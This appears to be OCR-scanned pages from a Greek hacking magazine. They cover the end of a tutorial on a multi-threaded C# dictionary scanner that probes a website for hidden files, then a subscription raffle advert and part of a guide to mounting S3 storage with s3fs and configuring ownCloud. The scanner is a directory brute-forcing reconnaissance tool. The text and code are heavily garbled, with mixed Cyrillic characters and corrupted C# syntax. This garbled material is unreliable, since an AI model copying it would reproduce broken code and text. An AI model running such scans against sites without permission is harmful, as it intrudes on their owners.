κατατοπιστικὀ άρθρο για ro πως ακριβώς η καρδιά του «ΝΕΤ Virtual Machine (η 
CLR, Common Language Runtime) χειρίζεται τα threads, καθώς και αναφορές για 
την παράλληλη επεξεργασία, µπορείτε να διαβάσετε σε αυτό το άρθρο rou MSDN: 
http://bit.ly/threadMGMCLR. Το τελευταίο είναι λίγο παλιό, αλλά παρέχει απαραίτη- 
τες γνώσεις για όσους επιθυμούν να µάθουν περισσότερα. 


Μεθοδολογία και threads στην πράξη 


Το πρὀγραμμά µας διαβάζει éva λεξικό µε μερικές χιλιάδες ονόματα αρχείων και 
για καθένα ελέγχει αν υπάρχει σε ένα δεδομένο site. Αποφασίσαμε, λοιπόν, αυτές 
τις δοκιμές να τις υλοποιήσουμε µε threads. Μάλιστα, το πλήθος των threads θα 
δίνεται από το χρήστη κατάτην κλήση του προγράµµατος. Φυσικά, υπάρχει éva ελά- 
χιστο και ένα μέγιστο όριο στο πλήθος των threads -- και τα έχουµε ορίσει σε 1 και 
100 αντίστοιχα. 


Επίσης, αποφασίσαμε να µοιράσουµε ομοιόμορφα σε κάθε thread το πλήθος των 
αρχείων που θα ελεγχθούν. Πα παράδειγµα, αν το λεξικό µας έχει 100 ονόματα ap- 
χείων και ο χρήστης ορίσει 5 threads, τότε κάθε thread 8a αναλάβει να ελέγξει апо 
20 ονόματα (βλ. εικόνα 1). Φυσικά το πρόγραµµα προβλέπει και τις περιπτώσεις 
εξαιρέσεων. Αναλυτικότερα: 


Αν το πλήθος των ονομάτων εἶναι μικρότερο апо το πλήθος των threads, τότε ο 
αριθµός των threads που θα εκτελεστούν '᾿εκφυλίζεται' στο πλήθος των ονομάτων 
και συνεπώς κάθε thread θα αναλάβει éva ὀνομα. 


Αν η κατανομή των ονομάτων στα threads δεν µπορεί va γίνει ομοιόμορφα, T.X., επει- 
δή υπάρχουν 10 ονομάτα στο λεξικό κι έχουµε ορίσει З threads, τότε το τελευταίο 
thread θα αναλάβει τα ονόματα που περισσεύουν. Έτσι, για 10 ονόματα το thread1 
θα αναλάβει 3 ονόματα, ro thread2 επίσης З ονόματα και το thread3 θα αναλάβει 4 
ονόματα. 


Ly HE == 
Ὄνομα Αρχείου Καταλόγων = — 
C:NUsersvandreas GoogleDrive Publications Delta Hacker 4027 ScanDir2 directoryJist-100 54 ll 
Δώστε αρχικό καταλόγο (URL) 
http://www satanas. com Τύπος Αρχείων aspx — Proxy Port 0 — Threads 55 


“www. .com/login a: 


ке Εγγραφές: 100 Διαβάστηκαν: 100 Βρέθηκαν: 2 [ Αώρωση | Tem 
 —w G И" 


Μόλις έχουµε ολοκληρώσει την έρευνα σε site, χρησιμοποιώντας λεξικό µε 100 βασικά ονόματα τύπου .aspx (ΝΕΤ). 
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Ακολουθεί οκώδικας που υλοποιεί τα παραπάνω. 


// Divide the whole dictionary іп N threads and execute... 
// read dictionary from disk 


try 
{ 
this.dictionaryFileLines = File.ReadAllLines(textBoxFile.Text); 
j 
catch (Exception ex) 
{ 
МеѕѕареВох. Ѕћом( "Αποτυχία ανάγνωσης του apxetou:\n"+ ex.Message, "Πρόβλημα! ", 
MessageBoxButtons.OK, 
MessageBoxIcon.Error); 
return; 
} 


int iNumOfThreads = Convert.ToInt16(numericUpDownThreads.Value); 
int iDictionaryLength = dictionaryFileLines.Count(); 
if (iNumOfThreads > iDictionaryLength) 
iNumOfThreads = iDictionaryLength; 
label0.Text = (Convert.ToInt32(label0.Text) + iDictionaryLength).ToString(); 
int step = iDictionaryLength / iNumOfThreads; 
int n2 = 0; 
int[] rangesFrom = new int[iNumOfThreads]; // Keeps the 'from' range. 


int[] rangesTo = new int[iNumOfThreads]; // Keeps the 'to' range. 
int rangesSize - 0; // The size of the above arrays. 
Boolean goon - true; 


// Create two parallel arrays with the ranges (from,to) to assign N threads to 
M filenames. 


for (int i = 0; i < iDictionaryLength; i += step) 
1 
rangesSize**; 
if (rangesSize >= iNumOfThreads) // force this to be the last step. 
{ 
n2 = (iDictionaryLength - 1); 
goon = false; 
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else 


n2 = (i + step - 1); 
n 


Αυτό που κάνουμε στο παραπάνω τµήµα κὠδικα είναι η υλοποίηση της λογικής του 
μοιράσματος των ονομάτων αρχείων ανά thread. Па να γίνει πιο κατανοητός o aà- 
γόριθµος θα rov περιγράψουμε µε éva παράδειγμα. Έστω ότι το πλήθος των OVO- 
μάτων στο λεξικό είναι 100 και ότι το πλήθος των threads είναι 5. Apa, θα θέλουμε 
20 ονόματα ανά thread. Κατ’ αρχάς διαβάζουμε τα περιεχόμενα του λεξικού από το 
δίσκο και τα βάζουμε µέσα σε ένα array of strings, το dictionaryFileLines. Μετά, uno- 
λογίζουμε κάποιες βασικές τιμές που τις καταχωρούμε στις αντίστοιχες µεταβλη- 
τές. (Δεν χρειάζεται ανάλυση εδώ, αφού και µια απλή ανάγνωση του кшбіка εἰναι 
αρκετή.) Τέλος, φτιάχνουμε δύο δυναμικά arrays (rangesFrom και rangesTo) τα οποία 
θα κρατάνε το εύρος των τιμών που θα’δουλέψουν' καθένα από τα 5 threads. Δηλα- 
δή, στην περίπτωσή µας θα έχουμε: 


idx rangesFrom rangesTo 


0 0 19 
1 20 39 
2 40 59 
3 60 78 
4 80 B9 


Αυτό που μένει λοιπόν εἰναι να φτιάξουμε µια συνάρτηση που θα λαμβάνει ως πα- 
ραμέτρους ζευγάρια «από, έως» κάθε γραμμής παραπάνω και Ва "топа" τα αντί- 
στοιχα ονόματα από το λεξικό, προκειµένου να ελέγξει αν υπάρχουν στο προς εξέ- 
ταση site. H συνάρτηση αυτή θα κληθεί 5 φορές, όσες και οι γραμμές του πίνακα 
ή αλλιώς το πλήθος των threads που ορίσαμε. Apa, αν η συνάρτηση κληθεί σε 5 
διαφορετικά threads τότε έχουµε υλοποιήσει τον στόχο µας. Αυτό λοιπόν το κατα- 
φέρνει ο ακόλουθος κώδικας: 


// Start the thread per each array 
for (int i = O; i < rangesSize; i++) 
t 

int from = rangesFrom[i]; 

int to = rangesTo[i]; 


string s = "Starting thread..." + (from*1).ToString() + " to " + (to*1). 
ToString(); 
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AddString(s); 
Thread myNewThread = new Thread(() => processLines(from, to)); 
myNewThread.Start(); 
MyThreads.Add(myNewThread); // keep threads in list 
} 


Art ότι βλέπετε, η βασική function που καλείται εἶναι η processLines(from, to). Па 
την ακρίβεια, καλείται τόσες φορές όσα εἰναι ra threads που έχει ορίσει ο χρή- 
στης να τρέχουν. Οι δε παράμετροι from και їо περιέχουν τις γραμμές των arrays 
rangesFrom και ranges[o. H συνάρτηση αυτή επιτελεί το βασικό σκοπό το проүран- 
ματος: Διαβάζει τις λέξεις (από from έως to) που βρίσκονται oro λεξικό και για κάθε 
λέξη εξετάζει την ύπαρξη αντίστοιχου αρχείου στο προς εξέταση site. O βασικός 
κώὠδικάς της είναι: 


private void processLines(int from, int to) 


{ 


// read a line of text 
for (int i = from; i <= to && !this.closeRequested; i++) 
{ 
lock (this) 
í 
if (this.closeRequested) 
break; 
//Create the url 
url = 1п1ї1а1_иг1 + dictionaryFileLines[i] + textBoxFileType.Text; 
recordsRead++; 
Showlteration(Convert.ToString(recordsRead)); 
//Try to GET the url 
int res = get URL(ur1); 


url += textBoxFileType.Text; 
if (!normal) 
break; 
) //lock 
πος 
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Απ' ότι βλέπετε, έχουµε την επαναληπτική διαδικασία (from-to), η οποία διακόπτε- 
ται όταν η τιµή this.closeRequested πάρει την τιµή false. Πληροφοριακά, λέμε ότι 
την τιµή false θα την πάρει όταν ο χρήστης πατήσει το κουμπί "Ακύρωση". H this. 
closeRequested δεν είναι παρά µια private μεταβλητή της τρέχουσας κλάσης, γε- 
γονός που την κάνει προσβάσιμη апо κάθε function αυτής - καθως και από κάθε 
thread. 


H βασική function που κάνει την εργασία είναι η get_URL(url). Αυτή είναι που ελέγχει 
την ύπαρξη του αρχείου, αφού του 'κολλήσει' και τον τύπο του αρχείου. H συγκε- 
κριμένη εργασία δεν πρέπει να διακοπεί ή/και να αναμειχθεί από/µε άλλο thread. [L 
αυτό το λόγο βάζουμε τον κώδικα ανάµεσα στο περίφημο lock(this), στε va εκτε- 
λεστεί ολόκληρο το τµήµα κώδικα και όλα τα άλλα threads να περιμένουν να τε- 
λειώσει. 


Στο σηµείο δημιουργίας threads παρατηρήστε ότι κάθε φορά που ξεκινάμε ένα νέο 
(new Thread) ro καταχωρούμε σε μιαλίστα µε то όνομα MyThreads. Αυτό το κάνουμε 
ώστε κάθε φορά να ξέρουμε ποια threads έχουµε ενεργά κι αν ο χρήστης αποφασί- 
σει να κλείσει το πρόγραμμα πριν ολοκληρωθεί η διαδικασία να µπορέσουµενατα 
ακυρώσουμε µε TOV εξής κώδικα: 


private void Forml_FormClosing(object sender, FormClosingEventArgs e) 


{ 


// Navigate all active threads (if any) and force abort... 
foreach (Thread MyThread in MyThreads) 
MyThread.Abort(); 
} 


Όπως βλέπετε, έχουµε σταθεί στο FormClosing event. Με αυτόν τον τρόπο, είτε 
κλείσει ο χρήστης την εφαρµογή µας апо το κουμπί "Έξοδος", είτε апо το περίφημο 
[X] (πάνω δεξιά), είτε апо ro built-in μενού του παραθύρου (πάνω αριστερά), είτε 
πατώντας απλά [CTRL+F4], ο κώδικας θα εκτελεστεἰ. 


Ακόμα µια αναφορά θεωρούμε ότι αξίζει τον κόπο: Στον κὠδικα παραπάνω, καλείται 
η function AddString(s). Αυτή παίρνει ως παράμετρο µια σειρά χαρακτήρων (string) 
και στην περίπτωσή µας αναφέρεται σε ένα ενημερωτικό μήνυμα που θα εμφανι- 
στεί στο κεντρικό component ενημέρωσης της εφαρμογής µας. Στην εικόνα 1 θα 
δείτε την αντίστοιχη ενηµέρωση στην αναφορά "Starting thread..". Αν πάμε στην 
αντίστοιχη συνάρτηση Өа δούµε ro ακόλουθο τµήµα κώδικα: 


private void AddString(String s) 


{ 


richTextBoxOutput.Invoke(new Action(() => richTextBoxOutput.AppendText(s 
+ Environment.NewLine))); 
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} 


Αν έχετε δουλέψει µε τα components του «ΝΕΤ, θα αναρωτηθείτε γιατί παίζουμε µε 
το Invoke και δεν κάνουμε κατευθείαν ανάθεση, ως ακολούθως: 


private void AddString(String s) 
t 


richTextBoxOutput.AppendText(s + Environment.NewLine); 


Xy, ra праүната δεν εἰναι τόσο απλά εδω. Όπως είπαμε στην αρχή, όταν ένα rtpó- 
үрарра C£ εκτελείται, μπαίνει κάτω από éva νέο process και ξεκινάει éva αρχικό 
thread που µέσα σε αυτό εκτός των άλλων θα”τρέξουν” блата Ul Components, δηλα- 
δή ότι βλέπουμε στη φόρμα µας (labels, textboxes, checkboxes к.Ап.). Αν τώρα εμείς 
φτιάξουμε νέα threads, τότε πρέπει va ξέρουμε ότι µέσα από αυτά δεν είναι δυνατόν 
να αναφερθούμε απ’ ευθείας σε ένα Ul Component που τρέχει σε άλλο thread (το 
default), αφού ro inter-thread communication δεν επιτρέπεται σε Ul components. Па 
να μπορέσουμε, π.χ. να εµφανίσουµε ένα απλό μήνυμα στη φόρμα µας όταν βρισκό- 
μαστε σε κάποιο διαφορετικό thread апо ro default, πρέπει να το κάνουμε µε ειδικό 
χειρισμό. Εδώ έρχεται η έννοια των delegates. Το delegate γενικά αναφέρεται σε 
µια συνάρτηση (σε ένα reference προς συνάρτηση, για να μιλήσουμε µε όρους ΝΕΤ) 
η οποία (συνάρτηση) θα κληθεί όταν πραγµατοποιηθεί éva συγκεκριµένο event. 
Ta delegates χρησιμοποιούνται συχνά σε καταστάσεις inter-thread communication, 
όπως στην περίπτωσή µας опоо η συνάρτηση AddString ενδέχεται να κληθεί όχι 
µόνο µέσα апо το default thread αλλά και µέσα апо κάποιο άλλο thread. Υπάρχουν 
πολλοί τρόποι που μπορούμε να υλοποιήσουμε κάτι τέτοιο. O πιο απλός εἰναι να 
κάνουμε χρήση της default member function ονόματι invoke, την οποία παρέχει το 
ΝΕΤ 4.5 για κάθε UI component (δείτε και την υλοποίηση της συνάρτησης addstring). 


Χρήσιμο εἶναι να αναφέρουμε ότι στο πρόγραµµα έχουµε υλοποιήσει µια τεχνική 
validation κατά την οποία ενεργοποιούµε éva component μόνον όταν έχουν συμπλη- 
ρωθεί τα απαραίτητα πεδία και συνεπώς µπορεί να κληθεί, διαφορετικά παραμένει 
ανενεργό. Στην περίπτωσή µας, αν παρατηρήσετε το κουμπί Εκτέλεση’ όταν ξεκινά 
το πρόγραμμα, θα δείτε ότι εἶναι disabled. Μόλις γεμίζουμε τα απαραίτητα πεδία 
που απαιτούνται για να κληθεί (μόλις, δηλαδή, επιλέξουμε λεξικό, αρχικό κατάλογο, 
URL και τύπο αρχείου), τότε γίνεται enabled. Αν πάλι διαγράψουµε κάποιο από ra TE- 
ριεχόµενα των απαραίτητων πεδίων, τότε ξαναγίνεται disabled. Αυτή η συµπεριφο- 
ра υλοποιείται σχετικά εύκολα, αν "ka8rjoouue" επάνω στο TextChanged event κάθε 
απαραίτητου component. Па παράδειγµα, ο κώδικας για ro textbox που περιέχει TO 
όνομα του λεξικού εἰναι: 


private void textBoxFile_TextChanged(object sender, EventArgs e) 


{ 
if (textBoxSite.Text.Length > 0 && 
textBoxFile.Text.Length > 0 && 
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textBoxFileType.Text.Length > 0) 

btn_Ektelesh.Enabled = true; 
else 

btn_Ektelesh.Enabled = false; 


Επίλογος 


Παρουσιάσαµε μερικά προχωρημένα θέµατα προγραμματισμού σε Οὔ, κάτω апо 
το περιβάλλον «ΝΕΤ 4.5 κι εφαρμόζοντάς τα σε ένα πρόγραµµα web crawling. 
Μαζί µε τη σύντομη ανάλυσή µας σας δίνουμε και τον Κώδικα του προγράµµατος 
(http://bit.ly/dh042scandir2). Όπως πάντα, µπορείτε va то κάνετε ότι θέλετε, αρκεί 
να πειραμµατιστείτε µε στόχο τη γνώση και να µην προκαλέσετε προβλήματα σε 
κάποιον χρήστη й ..server ;) 


Επί της ουσίας, μόλις ξύσαμε την κορυφή ενός παγόβουνου µε θέµατα που то κα- 
θένα θα μπορούσε να απαιτεί κάποια χρόνια μελέτης. Ναι, τόσο σηµαντικά και τόσο 
πρόσφορα για µελέτη, πειραματισμό και έρευνα εἰναι. 


Όπως θα έχετε ήδη διαπιστώσει µε TNV τέχνη του προγραμματισμού δεν παίρνουμε 
μία λύση για κάθε πιθανό πρόβλημα ή ανάγκη. Υπάρχουν πάρα πολλοί τρόποι για να 
υλοποιήσεις κάτι. Με το ScanDir v2.0 προτείνουμε έναν τρόπο - και δεν ξέρουμε αν 
είναι ο καλύτερος. Ίσως δεν µας ενδιαφέρει και πολύ. Το όριο είναι η φαντασία µας 
KAL TO μεταφορικό μέσο το μεράκι µας — ἐτσιπρέπει va εἶναι. Προτείνουμε ναμελε- 
τήσετε και va επεκτείνετε το πρόγραμμα, WOTE Vd καλύπτει κι άλλες ανάγκες ή va 
κάνει εντελώς διαφορετικά πράγματα апо αυτά για ra οποία φτιάχτηκε. 
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Αυτό то Mac mini είναι σχεδιασμένο ώστε να κάνει ότι θέλετε - 
και πολλά περισσότερα. 


Αυτό то Mac mini δεν είναι ro βασικό μοντέλο, και κοστίζει 1129 ευρώ 
(http://store.istorm.gr/mac/mac-mini/2-8ghz-mac-mini.html). 


Αυτό To Mac mini To κληρώνουμε μεταξύ 25 αναγνωστών µε Jumbo- 
Pack Plus (60 τεύχη). 


Αν η συνδροµή σας πλησιάζει στη λήξη της, αυτό ro Mac mini είναι 
εξαιρετικά πιθανό να γίνει δικό сас. 


fia va πάρετε µέρος στην κλήρωση, αρκεί va πάρετε κι εσείς Jumbo- 
Pack Plus συμπληρώνοντας κατάλληλα τη φόρμα παραγγελίας ото 
http://deltahacker.gr/pdf12order/#s2. 


Από την ἴδια τη φόρμα παραγγελίας βλέπετε πόσους αναγνώστες 
με Jumbo-Pack Plus χρειαζόμαστε ακόµα, WOTE να προχωρήσουμε 
στην κλήρωση. 


Προσέξτε: Αν και θα περιμένουμε боо χρειαστεί για να έχουµε 25 
συνδρομητές µε Jumbo-Pack Plus και να τους Κκληρώσουµε то Mac 
mini, αυτό δεν σηµαίνει ότι δεν μπορούμε να κάνουμε κάτι για να ETU- 
σπεύσουµε τη διαδικασία. Κάντε αυτό που πρέπει, συμπληρώνοντας 
τη φόρμα παραγγελίας: http://deltahacker.gr/pdf12order/#s2 


Καλή σας επιτυχία! 


Skill: Intermediate 
Tags: 041, S3FS, ownCloud, certificates, certificate authority, BitTorrent Sync 


Evac server, 
δύο σύννεφα 


by subZraw 


O υπερσύγχρονος server µας εκτείνεται στα clouds δύο διαφορετικών 
hosting providers kat προς το παρόν έχουµε τελειώσει µε To compute μέρος, 
ενισχύοντας μάλιστα και την ασφάλειά του. Σ’ αυτό το άρθρο κατασκευάζουµε 
την απαραίτητη γέφυρα μεταξύ compute και storage. Επίσης, στο compute µέρος 
εγκαθιστούµε το BitTorrent Sync, ενώ αποκτάµε κι ένα έγκυρο, υπογεγραμμένο 
πιστοποιητικό το οποίο χαρίζουµε oro ownCloud. 


Πα την απομακρυσμένη προσάρτηση buckets rou Storage Qloud ото eyjafjallajokull 
-αυτό εἶναι το hostname του Droplet µας- καταφεύγουμε στο s3fs-fuse project 
(https://github.com/s3fs-fuse/s3fs-fuse). Δεν υπάρχει κάποιο έτοιμο πακέτο για то 
Ubuntu, οπότε θα κατεβάσουµε τον πηγαίο κὠδικα και θατον µεταγλωττίσουμε HÓ- 
vot µας. 


Σημείωση: Па τη συνέχεια υποθέτουμε ότι έχετε διαβάσει TO πρώ- 
TO (http://deltahacker.gr/actsubs-1srv2clouds-p]3) και το δεύτερο 
(http://deltahacker.gr/actsubs-1srv2clouds-p23) μέρος του μίνι αφιερώµατός 


μας. 


Λήψη κώδικα s3fs-fuse, μεταγλώττιση και χρήση 


Ξεκινάμε µε την εγκατάσταση ορισμένων πακέτων, τα οποία εἶναι απαραίτητα για 
την επιτυχή μεταγλώττιση TOU s3fs-fuse: 


admin@eyjafjallajokull:-$ sudo apt-get install build-essential git \ 
libfuse-dev libcurl4-openssl-dev libxml2-dev automake libtool \ 
pkg-config libssl-dev 


Φτιάχνουμε έναν κατάλογο εργασίας, µεταβαίνουμε o' αυτόν και κατεβάζουµε το 
tarball µε τον κώδικα апо την έκδοση 1.77 του s3fs-fuse. 
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admin@eyjafjallajokull:-$ mkdir -/workbench 
admin@eyjafjallajokull:-$ cd -/workbench 


admin@eyjafjallajokull:~/workbench$ wget https://github.com/s3fs-fuse/s3fs- 
fuse/archive/v1.77.tar.gz -0 s3fs-v1.77. 
tar.gz 


Προσοχή: Θα ανακαλύψετε ότι υπάρχει και νεότερη έκδοση rou s3fs-fuse. 
Ωστόσο ката τις δικές µας δοκιμές -και κάναμε πολλές, σε περισσότερα апо 
éva συστήµατα- εἰχαμε προβλήματα µε την προσάρτηση buckets. Συγκεκρι- 
μένα, µε την ἐκδοση 1.78 η διαδικασία αποτύγχανε επιστρέφοντας το μήνυ- 
μα "remote endpoint not connected". Ίσως τη στιγµή που διαβάζετε αυτές τις 
γραμμές να χει βγει ακόµη πιο νέα ἐκδοση, η οποία δεν θα παρουσιάζει την 
ελαττωματική αυτή συμπεριφορά µε ro Storage Qloud. Όπως και να χει για 
τη συνέχεια χρησιμοποιούμε την έκδοση νϑ.77, που αποδεδειγμένα δουλεύει 
χωρίς προβλήματα. 

Αποσυµμπιέζουμε το αρχείο s3fs-v1.7 7.tar.gz και μεταβαίνουμε στο νέο κατάλογο που 

δημιουργείται: 


admin@eyjafjallajokull:-/workbench$ tar zxvf s3fs-v1.77.tar.gz 
admingeyjafjallajokull:-/workbench$ cd s3fs-fuse-1.77 


Προετοιμάζουμε το περιβάλλον, µεταγλωττίζουμε και, µε δικαιώµατα διαχειριστή, 
εγκαθιστούµε. Παρατηρήστε ότι το βασικό εκτελέσιμο, το s3fs, καθώς κι άλλα OU- 
νοδευτικά αρχεία, τα θέλουμε οργανωμένα κάτω апо ro /usr/local. 


admin@eyjafjallajokull:-/workbench/s3fs-fuse-1.77$ ./autogen.sh 


admin@eyjafjallajokull:-/workbench/s3fs-fuse-1.77$ ./configure 
--prefix=/usr/local 


admin@eyjafjallajokull:~/workbench/s3fs-fuse-1.77$ make 
admin@eyjafjallajokull:~/workbench/s3fs-fuse-1.77$ sudo make install 


Όλα δείχνουν να εἶναι καλά, όπως υποδηλώνει και µια πρώτη εκτέλεση του s3fs: 


admin@eyjafjallajokull:-/workbench/s3fs-fuse-1.77$ s3fs --version 
Amazon Simple Storage Service File System 1.77 

Copyright (C) 2010 Randy Rizun <rrizun@gmail.com> 

License GPL2: GNU GPL version 2 <http://gnu.org/licenses/gpl.html> 
This is free software: you are free to change and redistribute it. 
There is NO WARRANTY, to the extent permitted by law. 


49 


YV HAQKER 


Σειρά ἐχει n δηµιουργία καταλόγων, στους οποίους θα συνδεθούν Tq artoudkpuopé- 
να buckets rou Storage Qloud. Па тїс ανάγκες µας είχαμε ήδη δύο buckets που θέλα- 
ре va προσαρτήσουμε: éva µε video tutorials (deltaCast) κι ένα µε τεύχη (deltaHacker): 


admin@eyjafjallajokull:-/workbench/s3fs-fuse-1.77$ cd 
admin@eyjafjallajokull:-$ sudo mkdir -p /mnt/sqloud/deltaCast 
admin@eyjafjallajokull:-$ sudo mkdir /mnt/sqloud/deltaHacker 


Ακολούθως, στο /etc πρέπει να φτιάξουμε ένα αρχείο απλού κειµένου, T.X., µε τη 
βοήθεια rou nano, το οποίο θα ονομάζεται passwd-s3fs και θα περιλαμβάνει τα API 
Key και Secret Key. Αυτά τα δύο strings είναι στο λογαριασμό µας στη GreenQloud — 
και συγκεκριµένα στην κατηγορία АР! Access, στο προφίλ του χρήστη µας. H µορφή 
που οφείλει να έχει то /etc/passwd-s3fs είναι 


API Key:Secret key 


χωρίς κενά. Το αρχείο θα ανήκει στο χρήστη admin, ο οποίος Ва εἰναι ο μόνος µε 
δικαιώµατα ανάγνωσης κι εγγραφής. 


admin@eyjafjallajokull:-$ sudo nano /etc/passwd-s3fs 
admin@eyjafjallajokull:-$ sudo chown admin:admin /etc/passwd-s3fs 
admingeyjafjallajokull:-$ sudo chmod 600 /etc/passwd-s3fs 


Φροντίζουμε τώρα үа τις απαραίτητες προσθήκες oro /etc/fstab, ώστε n προσάρ- 
τηση/αποπροσάρτηση των buckets να γίνεται αυτόματα κι εύκολα. Δείτε λίγο τις 
δύο σχετικές γραµµές απὀ το /etc/fstab του eyjafjallajokull: 


s3fs#pqrxyz-deltacast /mnt/sqloud/deltaCast fuse noauto,uid=1000,gid=1000,use_ 
cache=/tmp/s3fs,del_cache,nomultipart,allow_other,url=https://s.greenqloud.com 
0 0 


s3fs# pqrxyz-deltahacker /mnt/sqloud/deltaHacker fuse 
noauto,uid-1000,gid-1000,use cache-/tmp/s3fs,del cache,nomultipart,allow. 
other,url-https://s.greengloud.com 0 0 


Τα ονόματα των buckets, pqrxyz-deltacast kat parxyz-deltahacker, σκόπιµα та mapou- 
σιάζουµε τροποποιημένα εδώ. Δεν εἶναι προσβάσιµα апо το web, αλλά καλό είναι 
να µη φαίνονται. Στη λίστα των επιλογών για το mount έχουµε συμπεριλάβει την 
παράμετρο noauto. Δεν θέλουμε να επιχειρείται αυτόματη προσάρτηση κατά то 
boot του λειτουργικού: εξαιτίας ενός race condition µε την υπηρεσία δικτύωσης, 
η προσάρτηση κατά περιπτώσεις αποτυγχάνει. Επειδή όµως καλό είναι το mount 
να γίνεται αυτόματα, ναι реу oro fstab βάζουμε ro noauto αλλά αµέσως µετά την 
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πολοκλήρωση” του boot προσαρτούµε αυτόματα τα buckets, χάρη σε µερικές απλές 
εντολές που έχουμε φροντίσει να υπάρχουν στο αρχείο /etc/rc.local. Περισσότερα 
επ’ αυτού θα πούμε σε λίγο. 


Μια άλλη ενδιαφέρουσα παράμετρος εἰναι η use. cache. Όταν ορίζεται, τότε κατά 
τη λήψη ñ αποστολή ενός αρχείου από ñ προς κάποιο bucket, δημιουργείται κι éva 
αντίγραφό του στο τοπικό filesystem και συγκεκριµένα στη θέση που υποδεικνύει 
η use. cache. Τις επόμενες φορές που θα ζητηθεί ro ίδιο αρχείο θα λαμβάνεται апо 
την cache κι αυτό σημαίνει σηµαντικό κέρδος σε ταχύτητα. Την cache μπορούμε 
να την αδειάζουµε ανά πάσα στιγµή χωρίς πρόβλημα, είτε χειροκίνητα είτε µε τη 
βοήθεια κάποιου cronjob. Επίσης, χάρη στην παράμετρο del. cache, η cache θα õa- 
γράφεται µε ro που αποπροσαρτάται το αντίστοιχο bucket. Па την περίπτωσή µας, η 
χρήση cache είναι πρακτικά επιβεβλημένη. Σκεφτείτε, T.X., τον πρώτο συνδρομητή 
που θα επιχειρήσει να κατεβάσει ro PDF του τεύχους 041: Με κλικ στο αντίστοιχο 
download URL 8a αποσταλεί αίτηµα στο ownCloud του eyjafjallajokull.parabing.com, 
το ζητούμενο αρχείο θα έρθει στο datacenter του Άμστερνταμ από ένα storage pod 
κάπου έξω από το Ρέικιαβικ, ο συνδρομητής Ва αρχίσει va το κατεβάζει — αλλά 
ταυτόχρονα αυτό 8a αποθηκευτεί και στην τοπική cache rou eyjafjallajokull. Έτσι, 
για τους επόμενους συνδρομητές δεν θα χρειαστεί να έρθει ξανά апо Ισλανδία. Ας 
εγκαινιάσουµε τώρα ra mounts για ra δύο buckets: 


admin@eyjafjallajokull:~$ sudo mount /mnt/sqloud/deltaCast 
admin@eyjafjallajokull:-$ sudo mount /mnt/sqloud/deltaHacker 
admin@eyjafjallajokull:-$ df -hT 


Filesystem Type Size Used Avail Use% Mounted on 

/dev/vdal ext4 406 6.3G 326 17% / 

попе tmpfs 4.0K 0 4.0К 0% /sys/fs/cgroup 

udev devtmpfs 991М 4.0K 991М 1% /dev 

tmpfs tmpfs 201М 336K 200М 1% /run 

попе tmpfs 5.0M 0 5.0М 0% /run/lock 

попе tmpfs 1001M 0 1001М 0% /run/shm 

попе tmpfs 100M 0 100М 0% /run/user 

s3fs fuse.s3fs 256T 0 256T 0% /mnt/sqloud/deltaCast 
s3fs fuse.s3fs 256T 0 256T 0% /mnt/sqloud/deltaHacker 


Πολύ ωραία. Па την αυτόματη προσάρτηση των buckets µετά апо reboot, προς το 
τέλος του /etc/rc.local αρκεί να υπάρχουν οι ακόλουθες δύο γραμμές: 


/bin/mount /mnt/sqloud/deltaCast 
/bin/mount /mnt/sqloud/deltaHacker 


Απλά κιόµορφα πράγματα. 
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Αρχική ρύθμιση ownCloud 


Όπως αναφέραμε στο πρώτο µέρος (http://deltahacker.gr/actsubs-1srv2clouds-p13) 
της σειράς, yta image rou Droplet µας επιλέξαμε αυτόπου εἰχεπροεγκατεστημένοτο 
ownCloud og LAMP stack, πάνω апо то Ubuntu Server 14.04 LTS. Αμέσως рета ro boot 
του συστήματος o Apache είναι ενεργός kt ау σε κάποιον web browser πληκτρολογή- 
σουμετη δημόσια διεύθυνση IP Tou VPS,8q δούμε τη σελίδα σύνδεσης του ownCloud. 
Εναλλακτικά, αν στη διεύθυνση IP έχουµε αντιστοιχίσει éva δικό µας domain name, 
π.χ. µέσα апо τον DNS manager της Digital Ocean, τότε στη μπάρα διευθύνσεων TOU 
browser αντί γιατην αριθμητική διεύθυνση IP θα πληκτρολογήσουμε αυτό το domain 
name. Στο δεύτερο µέρος (http://deltahacker.gr/actsubs-1srv2clouds-p23) της σει- 
ράς είχαμε εξάλλου φροντίσειγιατομπλοκάρισματουρογϊ80,οπότεηδιεύθυνσηπου 
για πρώτη φορά δώσαμε στον browser ήταν η https://eyjafjallajokull.parabing.com 


A Untrusted Connection 


Є @ https://eyjafjallajokull.parabing.com 6 || Q, Search пе A 
ef 


This Connection is Untrusted 
You have asked Firefox to connect securely to eyjafjallajokull.parabing.com, but we can't confirm that 


your connection is secure. 


Normally, when you try to connect securely, sites will present trusted identification to prove that you 
are going to the right place. However, this site's identity can't be verified. 


What Should I Do? 


If you usually connect to this site without problems, this error could mean that someone is trying to 
impersonate the site, and you shouldn't continue. 


Getme out of here! 


Technical Details 


+ 


eyjafjallajokull.parabing.com uses an invalid security certificate. 


The certificate is not trusted because it is self-signed. 
The certificate is only valid ог" 


(Error code: sec error unknown, issuer) 


* 


I Understand the Risks 


If you understand what's going оп, you can tell Firefox to start trusting this site's identification. Even if 
you trust the site, this error could mean that someone is tampering with your connection. 


Don't add an exception unless you know there's a good reason why this site doesn't use trusted 
identification. 


Add Exception. 


Το πιστοποιητικό για ro ownCloud είναι self-signed, οπότε δικαίως o web browser διαμαρτύρεται 
και ρίχνει с' euác το μπαλάκι. Του επιτρέπουµε να προχωρήσει κι αργότερα θα φροντίσουμε 
ώστε TO ownCloud να διαθέτει ένα έγκυρο πιστοποιητικό (που δεν είναι self-signed, αλλά 
υπογεγραμμένο anó µία έµπιστη Αρχή Πιστοποίησης). 
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Ë owncloud x E 


€ à parabing.com " d пез ἡ οσα ө = 


Get the apps to sync your files 


T. AMOROID APP ON ΄ дайы en the 
Desktop app ` μον 
SSL root certificates p ( »oogle рау @ AppStore 


If you want to support the project join development or spread the word: 


Show First Run Wizard again 


have used 2.4 MB of the available 31 GB 


Password 


mm Жу 99000000. Ф Change password 


Μην καθυστερήσετε την αλλαγή rou προκαθορισµένου password για ro χρήστη admin του ownCloud. Μπορείτε 
αν θέλετε να αλλάξετε Και то ὀνομά rou - ка! δεν χρειάζεται να επιλέξετε кат! στο στιλ "theAdmin" :P 


Πα το ownCloud χρησιµοποιείται éva self-signed certificate της βασικής εγκατάστα- 
σης του Apache, µε συνέπεια ο web browser vo εμφανίζει σχετική προειδοποίηση. Σε 
λίγο θα αποκτήσουμε ένα έγκυρο πιστοποιητικό για την εγκατάσταση του ownCloud 
μας, προς το παρόν όμως λέμε στον browser να κάνει µια εξαίρεση και να δεχτεί 
αυτό που τώρα βλέπει. 


